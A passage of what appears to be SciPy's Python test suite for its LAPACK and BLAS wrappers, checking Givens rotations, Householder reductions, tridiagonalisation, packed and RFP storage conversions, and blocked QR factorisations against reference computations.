ab = np.ones((3, 4), dtype=float)
b = np.ones(4, dtype=float)
tbtrs = get_lapack_funcs('tbtrs', dtype=float)
ab[-1, 3] = 0
_, info = tbtrs(ab=ab, b=b, uplo='U')
assert_equal(info, 4)
@pytest.mark.parametrize('ldab,n,ldb,nrhs', [
(5, 5, 0, 5),
(5, 5, 3, 5)
])
def test_invalid_matrix_shapes(self, ldab, n, ldb, nrhs):
"""Test ?tbtrs fails correctly if shapes are invalid."""
ab = np.ones((ldab, n), dtype=float)
b = np.ones((ldb, nrhs), dtype=float)
tbtrs = get_lapack_funcs('tbtrs', dtype=float)
assert_raises(Exception, tbtrs, ab, b)
def test_lartg():
for dtype in 'fdFD':
lartg = get_lapack_funcs('lartg', dtype=dtype)
f = np.array(3, dtype)
g = np.array(4, dtype)
if np.iscomplexobj(g):
g *= 1j
cs, sn, r = lartg(f, g)
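        # lartg builds the Givens rotation that zeros g: with |f| = 3 and
        # |g| = 4 we expect r = 5 and cs = 3/5; for complex g the sine
        # involves conj(g), hence sn = -4j/5 below.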
assert_allclose(cs, 3.0/5.0)
assert_allclose(r, 5.0)
if np.iscomplexobj(g):
assert_allclose(sn, -4.0j/5.0)
assert_(type(r) == complex)
assert_(type(cs) == float)
else:
assert_allclose(sn, 4.0/5.0)
def test_rot():
# srot, drot from blas and crot and zrot from lapack.
for dtype in 'fdFD':
c = 0.6
s = 0.8
u = np.full(4, 3, dtype)
v = np.full(4, 4, dtype)
atol = 10**-(np.finfo(dtype).precision-1)
if dtype in 'fd':
rot = get_blas_funcs('rot', dtype=dtype)
f = 4
else:
rot = get_lapack_funcs('rot', dtype=dtype)
s *= -1j
v *= 1j
f = 4j
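        # With c = 0.6 and |s| = 0.8 a full rotation maps each (u, v) pair to
        # (c*u + s*v, c*v - conj(s)*u) = (5, 0); entries skipped via the
        # off/inc/n keywords keep their original values 3 and f.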
assert_allclose(rot(u, v, c, s), [[5, 5, 5, 5],
[0, 0, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, n=2), [[5, 5, 3, 3],
[0, 0, f, f]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, offy=2),
[[3, 3, 5, 5], [f, f, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, incx=2, offy=2, n=2),
[[5, 3, 5, 3], [f, f, 0, 0]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, incy=2, n=2),
[[3, 3, 5, 5], [0, f, 0, f]], atol=atol)
assert_allclose(rot(u, v, c, s, offx=2, incx=2, offy=2, incy=2, n=1),
[[3, 3, 5, 3], [f, f, 0, f]], atol=atol)
assert_allclose(rot(u, v, c, s, incx=-2, incy=-2, n=2),
[[5, 3, 5, 3], [0, f, 0, f]], atol=atol)
a, b = rot(u, v, c, s, overwrite_x=1, overwrite_y=1)
assert_(a is u)
assert_(b is v)
assert_allclose(a, [5, 5, 5, 5], atol=atol)
assert_allclose(b, [0, 0, 0, 0], atol=atol)
def test_larfg_larf():
np.random.seed(1234)
a0 = np.random.random((4, 4))
a0 = a0.T.dot(a0)
a0j = np.random.random((4, 4)) + 1j*np.random.random((4, 4))
a0j = a0j.T.conj().dot(a0j)
    # Our test here will be to do one step of reducing a Hermitian matrix to
    # tridiagonal form using Householder transforms.
for dtype in 'fdFD':
larfg, larf = get_lapack_funcs(['larfg', 'larf'], dtype=dtype)
if dtype in 'FD':
a = a0j.copy()
else:
a = a0.copy()
# generate a householder transform to clear a[2:,0]
alpha, x, tau = larfg(a.shape[0]-1, a[1, 0], a[2:, 0])
# create expected output
expected = np.zeros_like(a[:, 0])
expected[0] = a[0, 0]
expected[1] = alpha
# assemble householder vector
v = np.zeros_like(a[1:, 0])
v[0] = 1.0
v[1:] = x
# apply transform from the left
a[1:, :] = larf(v, tau.conjugate(), a[1:, :], np.zeros(a.shape[1]))
# apply transform from the right
a[:, 1:] = larf(v, tau, a[:, 1:], np.zeros(a.shape[0]), side='R')
assert_allclose(a[:, 0], expected, atol=1e-5)
assert_allclose(a[0, :], expected, atol=1e-5)
@pytest.mark.xslow
def test_sgesdd_lwork_bug_workaround():
# Test that SGESDD lwork is sufficiently large for LAPACK.
#
# This checks that workaround around an apparent LAPACK bug
# actually works. cf. gh-5401
#
# xslow: requires 1GB+ of memory
p = subprocess.Popen([sys.executable, '-c',
'import numpy as np; '
'from scipy.linalg import svd; '
'a = np.zeros([9537, 9537], dtype=np.float32); '
'svd(a)'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
    # Check if an error occurred within 5 sec; the computation can
    # take substantially longer, and we will not wait for it to finish
for j in range(50):
time.sleep(0.1)
if p.poll() is not None:
returncode = p.returncode
break
else:
# Didn't exit in time -- probably entered computation. The
# error is raised before entering computation, so things are
# probably OK.
returncode = 0
p.terminate()
assert_equal(returncode, 0,
"Code apparently failed: " + p.stdout.read().decode())
class TestSytrd:
@pytest.mark.parametrize('dtype', REAL_DTYPES)
def test_sytrd_with_zero_dim_array(self, dtype):
# Assert that a 0x0 matrix raises an error
A = np.zeros((0, 0), dtype=dtype)
sytrd = get_lapack_funcs('sytrd', (A,))
assert_raises(ValueError, sytrd, A)
@pytest.mark.parametrize('dtype', REAL_DTYPES)
@pytest.mark.parametrize('n', (1, 3))
def test_sytrd(self, dtype, n):
A = np.zeros((n, n), dtype=dtype)
sytrd, sytrd_lwork = \
get_lapack_funcs(('sytrd', 'sytrd_lwork'), (A,))
# some upper triangular array
A[np.triu_indices_from(A)] = \
np.arange(1, n*(n+1)//2+1, dtype=dtype)
# query lwork
lwork, info = sytrd_lwork(n)
assert_equal(info, 0)
# check lower=1 behavior (shouldn't do much since the matrix is
# upper triangular)
data, d, e, tau, info = sytrd(A, lower=1, lwork=lwork)
assert_equal(info, 0)
assert_allclose(data, A, atol=5*np.finfo(dtype).eps, rtol=1.0)
assert_allclose(d, np.diag(A))
assert_allclose(e, 0.0)
assert_allclose(tau, 0.0)
# and now for the proper test (lower=0 is the default)
data, d, e, tau, info = sytrd(A, lwork=lwork)
assert_equal(info, 0)
# assert Q^T*A*Q = tridiag(e, d, e)
# build tridiagonal matrix
T = np.zeros_like(A, dtype=dtype)
k = np.arange(A.shape[0])
T[k, k] = d
k2 = np.arange(A.shape[0]-1)
T[k2+1, k2] = e
T[k2, k2+1] = e
# build Q
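        # Accumulate the Householder reflectors H_i = I - tau_i * v_i v_i^T;
        # for the upper-triangular storage used here, v_i is read from the
        # part of column i+1 of the returned data above the diagonal.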
Q = np.eye(n, n, dtype=dtype)
for i in range(n-1):
v = np.zeros(n, dtype=dtype)
v[:i] = data[:i, i+1]
v[i] = 1.0
H = np.eye(n, n, dtype=dtype) - tau[i] * np.outer(v, v)
Q = np.dot(H, Q)
# Make matrix fully symmetric
i_lower = np.tril_indices(n, -1)
A[i_lower] = A.T[i_lower]
QTAQ = np.dot(Q.T, np.dot(A, Q))
# disable rtol here since some values in QTAQ and T are very close
# to 0.
assert_allclose(QTAQ, T, atol=5*np.finfo(dtype).eps, rtol=1.0)
class TestHetrd:
@pytest.mark.parametrize('complex_dtype', COMPLEX_DTYPES)
def test_hetrd_with_zero_dim_array(self, complex_dtype):
# Assert that a 0x0 matrix raises an error
A = np.zeros((0, 0), dtype=complex_dtype)
hetrd = get_lapack_funcs('hetrd', (A,))
assert_raises(ValueError, hetrd, A)
@pytest.mark.parametrize('real_dtype,complex_dtype',
zip(REAL_DTYPES, COMPLEX_DTYPES))
@pytest.mark.parametrize('n', (1, 3))
def test_hetrd(self, n, real_dtype, complex_dtype):
A = np.zeros((n, n), dtype=complex_dtype)
hetrd, hetrd_lwork = \
get_lapack_funcs(('hetrd', 'hetrd_lwork'), (A,))
# some upper triangular array
A[np.triu_indices_from(A)] = (
np.arange(1, n*(n+1)//2+1, dtype=real_dtype)
+ 1j * np.arange(1, n*(n+1)//2+1, dtype=real_dtype)
)
np.fill_diagonal(A, np.real(np.diag(A)))
# test query lwork
for x in [0, 1]:
_, info = hetrd_lwork(n, lower=x)
assert_equal(info, 0)
# lwork returns complex which segfaults hetrd call (gh-10388)
# use the safe and recommended option
lwork = _compute_lwork(hetrd_lwork, n)
# check lower=1 behavior (shouldn't do much since the matrix is
# upper triangular)
data, d, e, tau, info = hetrd(A, lower=1, lwork=lwork)
assert_equal(info, 0)
assert_allclose(data, A, atol=5*np.finfo(real_dtype).eps, rtol=1.0)
assert_allclose(d, np.real(np.diag(A)))
assert_allclose(e, 0.0)
assert_allclose(tau, 0.0)
# and now for the proper test (lower=0 is the default)
data, d, e, tau, info = hetrd(A, lwork=lwork)
assert_equal(info, 0)
# assert Q^T*A*Q = tridiag(e, d, e)
# build tridiagonal matrix
T = np.zeros_like(A, dtype=real_dtype)
k = np.arange(A.shape[0], dtype=int)
T[k, k] = d
k2 = np.arange(A.shape[0]-1, dtype=int)
T[k2+1, k2] = e
T[k2, k2+1] = e
# build Q
Q = np.eye(n, n, dtype=complex_dtype)
for i in range(n-1):
v = np.zeros(n, dtype=complex_dtype)
v[:i] = data[:i, i+1]
v[i] = 1.0
H = np.eye(n, n, dtype=complex_dtype) \
- tau[i] * np.outer(v, np.conj(v))
Q = np.dot(H, Q)
# Make matrix fully Hermitian
i_lower = np.tril_indices(n, -1)
A[i_lower] = np.conj(A.T[i_lower])
QHAQ = np.dot(np.conj(Q.T), np.dot(A, Q))
        # disable rtol here since some values in QHAQ and T are very close
        # to 0.
assert_allclose(
QHAQ, T, atol=10*np.finfo(real_dtype).eps, rtol=1.0
)
def test_gglse():
# Example data taken from NAG manual
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s,d,c,z> gglse
func, func_lwork = get_lapack_funcs(('gglse', 'gglse_lwork'),
dtype=dtype)
lwork = _compute_lwork(func_lwork, m=6, n=4, p=2)
# For <s,d>gglse
if ind < 2:
a = np.array([[-0.57, -1.28, -0.39, 0.25],
[-1.93, 1.08, -0.31, -2.14],
[2.30, 0.24, 0.40, -0.35],
[-1.93, 0.64, -0.66, 0.08],
[0.15, 0.30, 0.15, -2.13],
[-0.02, 1.03, -1.43, 0.50]], dtype=dtype)
c = np.array([-1.50, -2.14, 1.23, -0.54, -1.68, 0.82], dtype=dtype)
d = np.array([0., 0.], dtype=dtype)
        # For <c,z>gglse
else:
a = np.array([[0.96-0.81j, -0.03+0.96j, -0.91+2.06j, -0.05+0.41j],
[-0.98+1.98j, -1.20+0.19j, -0.66+0.42j, -0.81+0.56j],
[0.62-0.46j, 1.01+0.02j, 0.63-0.17j, -1.11+0.60j],
[0.37+0.38j, 0.19-0.54j, -0.98-0.36j, 0.22-0.20j],
[0.83+0.51j, 0.20+0.01j, -0.17-0.46j, 1.47+1.59j],
[1.08-0.28j, 0.20-0.12j, -0.07+1.23j, 0.26+0.26j]])
c = np.array([[-2.54+0.09j],
[1.65-2.26j],
[-2.11-3.96j],
[1.82+3.30j],
[-6.41+3.77j],
[2.07+0.66j]])
d = np.zeros(2, dtype=dtype)
b = np.array([[1., 0., -1., 0.], [0., 1., 0., -1.]], dtype=dtype)
_, _, _, result, _ = func(a, b, c, d, lwork=lwork)
if ind < 2:
expected = np.array([0.48904455,
0.99754786,
0.48904455,
0.99754786])
else:
expected = np.array([1.08742917-1.96205783j,
-0.74093902+3.72973919j,
1.08742917-1.96205759j,
-0.74093896+3.72973895j])
assert_array_almost_equal(result, expected, decimal=4)
def test_sycon_hecon():
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
# DTYPES + COMPLEX DTYPES = <s,d,c,z> sycon + <c,z>hecon
n = 10
# For <s,d,c,z>sycon
if ind < 4:
func_lwork = get_lapack_funcs('sytrf_lwork', dtype=dtype)
funcon, functrf = get_lapack_funcs(('sycon', 'sytrf'), dtype=dtype)
A = (rand(n, n)).astype(dtype)
# For <c,z>hecon
else:
func_lwork = get_lapack_funcs('hetrf_lwork', dtype=dtype)
funcon, functrf = get_lapack_funcs(('hecon', 'hetrf'), dtype=dtype)
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
# Since sycon only refers to upper/lower part, conj() is safe here.
A = (A + A.conj().T)/2 + 2*np.eye(n, dtype=dtype)
anorm = norm(A, 1)
lwork = _compute_lwork(func_lwork, n)
ldu, ipiv, _ = functrf(A, lwork=lwork, lower=1)
rcond, _ = funcon(a=ldu, ipiv=ipiv, anorm=anorm, lower=1)
        # The estimate 1/rcond should agree with np.linalg.cond to within
        # 100% relative error.
assert_(abs(1/rcond - np.linalg.cond(A, p=1))*rcond < 1)
def test_sygst():
seed(1234)
for ind, dtype in enumerate(REAL_DTYPES):
# DTYPES = <s,d> sygst
n = 10
potrf, sygst, syevd, sygvd = get_lapack_funcs(('potrf', 'sygst',
'syevd', 'sygvd'),
dtype=dtype)
A = rand(n, n).astype(dtype)
A = (A + A.T)/2
# B must be positive definite
B = rand(n, n).astype(dtype)
B = (B + B.T)/2 + 2 * np.eye(n, dtype=dtype)
# Perform eig (sygvd)
eig_gvd, _, info = sygvd(A, B)
assert_(info == 0)
# Convert to std problem potrf
b, info = potrf(B)
assert_(info == 0)
a, info = sygst(A, b)
assert_(info == 0)
eig, _, info = syevd(a)
assert_(info == 0)
assert_allclose(eig, eig_gvd, rtol=1e-4)
def test_hegst():
seed(1234)
for ind, dtype in enumerate(COMPLEX_DTYPES):
# DTYPES = <c,z> hegst
n = 10
potrf, hegst, heevd, hegvd = get_lapack_funcs(('potrf', 'hegst',
'heevd', 'hegvd'),
dtype=dtype)
A = rand(n, n).astype(dtype) + 1j * rand(n, n).astype(dtype)
A = (A + A.conj().T)/2
# B must be positive definite
B = rand(n, n).astype(dtype) + 1j * rand(n, n).astype(dtype)
B = (B + B.conj().T)/2 + 2 * np.eye(n, dtype=dtype)
# Perform eig (hegvd)
eig_gvd, _, info = hegvd(A, B)
assert_(info == 0)
# Convert to std problem potrf
b, info = potrf(B)
assert_(info == 0)
a, info = hegst(A, b)
assert_(info == 0)
eig, _, info = heevd(a)
assert_(info == 0)
assert_allclose(eig, eig_gvd, rtol=1e-4)
def test_tzrzf():
"""
This test performs an RZ decomposition in which an m x n upper trapezoidal
array M (m <= n) is factorized as M = [R 0] * Z where R is upper triangular
and Z is unitary.
"""
seed(1234)
m, n = 10, 15
for ind, dtype in enumerate(DTYPES):
tzrzf, tzrzf_lw = get_lapack_funcs(('tzrzf', 'tzrzf_lwork'),
dtype=dtype)
lwork = _compute_lwork(tzrzf_lw, m, n)
if ind < 2:
A = triu(rand(m, n).astype(dtype))
else:
A = triu((rand(m, n) + rand(m, n)*1j).astype(dtype))
# assert wrong shape arg, f2py returns generic error
assert_raises(Exception, tzrzf, A.T)
rz, tau, info = tzrzf(A, lwork=lwork)
# Check success
assert_(info == 0)
# Get Z manually for comparison
R = np.hstack((rz[:, :m], np.zeros((m, n-m), dtype=dtype)))
V = np.hstack((np.eye(m, dtype=dtype), rz[:, m:]))
Id = np.eye(n, dtype=dtype)
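        # Each factor below is an elementary reflector Id - tau[x] * v_x v_x^H
        # with v_x the x-th row of V; Z is the product of all m reflectors.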
ref = [Id-tau[x]*V[[x], :].T.dot(V[[x], :].conj()) for x in range(m)]
Z = reduce(np.dot, ref)
assert_allclose(R.dot(Z) - A, zeros_like(A, dtype=dtype),
atol=10*np.spacing(dtype(1.0).real), rtol=0.)
def test_tfsm():
"""
    Test for solving a linear system whose coefficient matrix is a
    triangular array stored in Rectangular Full Packed (RFP) format.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = triu(rand(n, n) + rand(n, n)*1j + eye(n)).astype(dtype)
trans = 'C'
else:
A = triu(rand(n, n) + eye(n)).astype(dtype)
trans = 'T'
trttf, tfttr, tfsm = get_lapack_funcs(('trttf', 'tfttr', 'tfsm'),
dtype=dtype)
Afp, _ = trttf(A)
B = rand(n, 2).astype(dtype)
soln = tfsm(-1, Afp, B)
assert_array_almost_equal(soln, solve(-A, B),
decimal=4 if ind % 2 == 0 else 6)
soln = tfsm(-1, Afp, B, trans=trans)
assert_array_almost_equal(soln, solve(-A.conj().T, B),
decimal=4 if ind % 2 == 0 else 6)
        # Make A unit diagonal
A[np.arange(n), np.arange(n)] = dtype(1.)
soln = tfsm(-1, Afp, B, trans=trans, diag='U')
assert_array_almost_equal(soln, solve(-A.conj().T, B),
decimal=4 if ind % 2 == 0 else 6)
# Change side
B2 = rand(3, n).astype(dtype)
soln = tfsm(-1, Afp, B2, trans=trans, diag='U', side='R')
assert_array_almost_equal(soln, solve(-A, B2.T).conj().T,
decimal=4 if ind % 2 == 0 else 6)
def test_ormrz_unmrz():
"""
    This test performs a matrix multiplication with an arbitrary m x n matrix
    C and a unitary matrix Q without explicitly forming the array. The array
    data is encoded in the rectangular part of A which is obtained from
    ?TZRZF. The size of Q is inferred from the m, n, side keywords.
"""
seed(1234)
qm, qn, cn = 10, 15, 15
for ind, dtype in enumerate(DTYPES):
tzrzf, tzrzf_lw = get_lapack_funcs(('tzrzf', 'tzrzf_lwork'),
dtype=dtype)
lwork_rz = _compute_lwork(tzrzf_lw, qm, qn)
if ind < 2:
A = triu(rand(qm, qn).astype(dtype))
C = rand(cn, cn).astype(dtype)
orun_mrz, orun_mrz_lw = get_lapack_funcs(('ormrz', 'ormrz_lwork'),
dtype=dtype)
else:
A = triu((rand(qm, qn) + rand(qm, qn)*1j).astype(dtype))
C = (rand(cn, cn) + rand(cn, cn)*1j).astype(dtype)
orun_mrz, orun_mrz_lw = get_lapack_funcs(('unmrz', 'unmrz_lwork'),
dtype=dtype)
lwork_mrz = _compute_lwork(orun_mrz_lw, cn, cn)
rz, tau, info = tzrzf(A, lwork=lwork_rz)
# Get Q manually for comparison
V = np.hstack((np.eye(qm, dtype=dtype), rz[:, qm:]))
Id = np.eye(qn, dtype=dtype)
ref = [Id-tau[x]*V[[x], :].T.dot(V[[x], :].conj()) for x in range(qm)]
Q = reduce(np.dot, ref)
# Now that we have Q, we can test whether lapack results agree with
# each case of CQ, CQ^H, QC, and QC^H
trans = 'T' if ind < 2 else 'C'
tol = 10*np.spacing(dtype(1.0).real)
cq, info = orun_mrz(rz, tau, C, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - Q.dot(C), zeros_like(C), atol=tol, rtol=0.)
cq, info = orun_mrz(rz, tau, C, trans=trans, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - Q.conj().T.dot(C), zeros_like(C), atol=tol,
rtol=0.)
cq, info = orun_mrz(rz, tau, C, side='R', lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - C.dot(Q), zeros_like(C), atol=tol, rtol=0.)
cq, info = orun_mrz(rz, tau, C, side='R', trans=trans, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - C.dot(Q.conj().T), zeros_like(C), atol=tol,
rtol=0.)
def test_tfttr_trttf():
"""
    Test conversion routines between the Rectangular Full Packed (RFP) format
and Standard Triangular Array (TR)
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A_full = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transr = 'C'
else:
A_full = (rand(n, n)).astype(dtype)
transr = 'T'
trttf, tfttr = get_lapack_funcs(('trttf', 'tfttr'), dtype=dtype)
A_tf_U, info = trttf(A_full)
assert_(info == 0)
A_tf_L, info = trttf(A_full, uplo='L')
assert_(info == 0)
A_tf_U_T, info = trttf(A_full, transr=transr, uplo='U')
assert_(info == 0)
A_tf_L_T, info = trttf(A_full, transr=transr, uplo='L')
assert_(info == 0)
# Create the RFP array manually (n is even!)
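        # For even n, the 'U' RFP layout stores triu(A)[:, n//2:] in the top
        # n rows and folds the conjugate transpose of the leading n//2 x n//2
        # upper triangle into the lower rows.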
A_tf_U_m = zeros((n+1, n//2), dtype=dtype)
A_tf_U_m[:-1, :] = triu(A_full)[:, n//2:]
A_tf_U_m[n//2+1:, :] += triu(A_full)[:n//2, :n//2].conj().T
A_tf_L_m = zeros((n+1, n//2), dtype=dtype)
A_tf_L_m[1:, :] = tril(A_full)[:, :n//2]
A_tf_L_m[:n//2, :] += tril(A_full)[n//2:, n//2:].conj().T
assert_array_almost_equal(A_tf_U, A_tf_U_m.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_U_T,
A_tf_U_m.conj().T.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_L, A_tf_L_m.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_L_T,
A_tf_L_m.conj().T.reshape(-1, order='F'))
# Get the original array from RFP
A_tr_U, info = tfttr(n, A_tf_U)
assert_(info == 0)
A_tr_L, info = tfttr(n, A_tf_L, uplo='L')
assert_(info == 0)
A_tr_U_T, info = tfttr(n, A_tf_U_T, transr=transr, uplo='U')
assert_(info == 0)
A_tr_L_T, info = tfttr(n, A_tf_L_T, transr=transr, uplo='L')
assert_(info == 0)
assert_array_almost_equal(A_tr_U, triu(A_full))
assert_array_almost_equal(A_tr_U_T, triu(A_full))
assert_array_almost_equal(A_tr_L, tril(A_full))
assert_array_almost_equal(A_tr_L_T, tril(A_full))
def test_tpttr_trttp():
"""
    Test conversion routines between the Standard Packed (TP) format
    and Standard Triangular Array (TR)
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A_full = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A_full = (rand(n, n)).astype(dtype)
trttp, tpttr = get_lapack_funcs(('trttp', 'tpttr'), dtype=dtype)
A_tp_U, info = trttp(A_full)
assert_(info == 0)
A_tp_L, info = trttp(A_full, uplo='L')
assert_(info == 0)
# Create the TP array manually
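        # Packed 'U' storage concatenates the columns of the upper triangle;
        # indexing the transpose with tril_indices visits the entries in
        # exactly that order.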
inds = tril_indices(n)
A_tp_U_m = zeros(n*(n+1)//2, dtype=dtype)
A_tp_U_m[:] = (triu(A_full).T)[inds]
inds = triu_indices(n)
A_tp_L_m = zeros(n*(n+1)//2, dtype=dtype)
A_tp_L_m[:] = (tril(A_full).T)[inds]
assert_array_almost_equal(A_tp_U, A_tp_U_m)
assert_array_almost_equal(A_tp_L, A_tp_L_m)
# Get the original array from TP
A_tr_U, info = tpttr(n, A_tp_U)
assert_(info == 0)
A_tr_L, info = tpttr(n, A_tp_L, uplo='L')
assert_(info == 0)
assert_array_almost_equal(A_tr_U, triu(A_full))
assert_array_almost_equal(A_tr_L, tril(A_full))
def test_pftrf():
"""
    Test Cholesky factorization of a positive definite Rectangular Full
Packed (RFP) format array
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
pftrf, trttf, tfttr = get_lapack_funcs(('pftrf', 'trttf', 'tfttr'),
dtype=dtype)
        # Convert A to RFP form
Afp, info = trttf(A)
Achol_rfp, info = pftrf(n, Afp)
assert_(info == 0)
A_chol_r, _ = tfttr(n, Achol_rfp)
Achol = cholesky(A)
assert_array_almost_equal(A_chol_r, Achol)
def test_pftri():
"""
    Test Cholesky factorization of a positive definite Rectangular Full
Packed (RFP) format array to find its inverse
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
pftri, pftrf, trttf, tfttr = get_lapack_funcs(('pftri',
'pftrf',
'trttf',
'tfttr'),
dtype=dtype)
        # Convert A to RFP form
Afp, info = trttf(A)
A_chol_rfp, info = pftrf(n, Afp)
A_inv_rfp, info = pftri(n, A_chol_rfp)
assert_(info == 0)
A_inv_r, _ = tfttr(n, A_inv_rfp)
Ainv = inv(A)
assert_array_almost_equal(A_inv_r, triu(Ainv),
decimal=4 if ind % 2 == 0 else 6)
def test_pftrs():
"""
    Test Cholesky factorization of a positive definite Rectangular Full
Packed (RFP) format array and solve a linear system
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
B = ones((n, 3), dtype=dtype)
Bf1 = ones((n+2, 3), dtype=dtype)
Bf2 = ones((n-2, 3), dtype=dtype)
pftrs, pftrf, trttf, tfttr = get_lapack_funcs(('pftrs',
'pftrf',
'trttf',
'tfttr'),
dtype=dtype)
        # Convert A to RFP form
Afp, info = trttf(A)
A_chol_rfp, info = pftrf(n, Afp)
# larger B arrays shouldn't segfault
soln, info = pftrs(n, A_chol_rfp, Bf1)
assert_(info == 0)
assert_raises(Exception, pftrs, n, A_chol_rfp, Bf2)
soln, info = pftrs(n, A_chol_rfp, B)
assert_(info == 0)
assert_array_almost_equal(solve(A, B), soln,
decimal=4 if ind % 2 == 0 else 6)
def test_sfrk_hfrk():
"""
    Test for performing a symmetric/Hermitian rank-k operation on a matrix
    in RFP format.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
        prefix = 's' if ind < 2 else 'h'
trttf, tfttr, shfrk = get_lapack_funcs(('trttf', 'tfttr', '{}frk'
''.format(prefix)),
dtype=dtype)
Afp, _ = trttf(A)
C = np.random.rand(n, 2).astype(dtype)
Afp_out = shfrk(n, 2, -1, C, 2, Afp)
A_out, _ = tfttr(n, Afp_out)
assert_array_almost_equal(A_out, triu(-C.dot(C.conj().T) + 2*A),
decimal=4 if ind % 2 == 0 else 6)
def test_syconv():
"""
    Test for converting back and forth between the factored form returned by
    he/sytrf and the L and D factors/permutations.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
if ind > 1:
A = (randint(-30, 30, (n, n)) +
randint(-30, 30, (n, n))*1j).astype(dtype)
A = A + A.conj().T
else:
A = randint(-30, 30, (n, n)).astype(dtype)
A = A + A.T + n*eye(n)
tol = 100*np.spacing(dtype(1.0).real)
syconv, trf, trf_lwork = get_lapack_funcs(('syconv', 'sytrf',
'sytrf_lwork'), dtype=dtype)
lw = _compute_lwork(trf_lwork, n, lower=1)
L, D, perm = ldl(A, lower=1, hermitian=False)
ldu, ipiv, info = trf(A, lower=1, lwork=lw)
a, e, info = syconv(ldu, ipiv, lower=1)
        assert_allclose(tril(a, -1), tril(L[perm, :], -1), atol=tol, rtol=0.)
# Test also upper
U, D, perm = ldl(A, lower=0, hermitian=False)
ldu, ipiv, info = trf(A, lower=0)
a, e, info = syconv(ldu, ipiv, lower=0)
assert_allclose(triu(a, 1), triu(U[perm, :], 1), atol=tol, rtol=0.)
class TestBlockedQR:
"""
Tests for the blocked QR factorization, namely through geqrt, gemqrt, tpqrt
and tpmqr.
"""
def test_geqrt_gemqrt(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A = (rand(n, n)).astype(dtype)
tol = 100*np.spacing(dtype(1.0).real)
geqrt, gemqrt = get_lapack_funcs(('geqrt', 'gemqrt'), dtype=dtype)
a, t, info = geqrt(n, A)
assert(info == 0)
# Extract elementary reflectors from lower triangle, adding the
# main diagonal of ones.
v = np.tril(a, -1) + np.eye(n, dtype=dtype)
# Generate the block Householder transform I - VTV^H
Q = np.eye(n, dtype=dtype) - v @ t @ v.T.conj()
R = np.triu(a)
# Test columns of Q are orthogonal
assert_allclose(Q.T.conj() @ Q, np.eye(n, dtype=dtype), atol=tol,
rtol=0.)
assert_allclose(Q @ R, A, atol=tol, rtol=0.)
if ind > 1:
C = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transpose = 'C'
else:
C = (rand(n, n)).astype(dtype)
transpose = 'T'
for side in ('L', 'R'):
for trans in ('N', transpose):
c, info = gemqrt(a, t, C, side=side, trans=trans)
assert(info == 0)
if trans == transpose:
q = Q.T.conj()
else:
q = Q
if side == 'L':
qC = q @ C
else:
qC = C @ q
assert_allclose(c, qC, atol=tol, rtol=0.)
# Test default arguments
if (side, trans) == ('L', 'N'):
c_default, info = gemqrt(a, t, C)
assert(info == 0)
assert_equal(c_default, c)
# Test invalid side/trans
assert_raises(Exception, gemqrt, a, t, C, side='A')
assert_raises(Exception, gemqrt, a, t, C, trans='A')
def test_tpqrt_tpmqrt(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
B = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A = (rand(n, n)).astype(dtype)
B = (rand(n, n)).astype(dtype)
tol = 100*np.spacing(dtype(1.0).real)
tpqrt, tpmqrt = get_lapack_funcs(('tpqrt', 'tpmqrt'), dtype=dtype)
# Test for the range of pentagonal B, from square to upper
# triangular
for l in (0, n // 2, n):
a, b, t, info = tpqrt(l, n, A, B)
assert(info == 0)
# Check that lower triangular part of A has not been modified
assert_equal(np.tril(a, -1), np.tril(A, -1))
# Check that elements not part of the pentagonal portion of B
# have not been modified.
assert_equal(np.tril(b, l - n - 1), np.tril(B, l - n - 1))
# Extract pentagonal portion of B
B_pent, b_pent = np.triu(B, l - n), np.triu(b, l - n)
# Generate elementary reflectors
v = np.concatenate((np.eye(n, dtype=dtype), b_pent))
# Generate the block Householder transform I - VTV^H
Q = np.eye(2 * n, dtype=dtype) - v @ t @ v.T.conj()
R = np.concatenate((np.triu(a), np.zeros_like(a)))
# Test columns of Q are orthogonal
assert_allclose(Q.T.conj() @ Q, np.eye(2 * n, dtype=dtype),
atol=tol, rtol=0.)
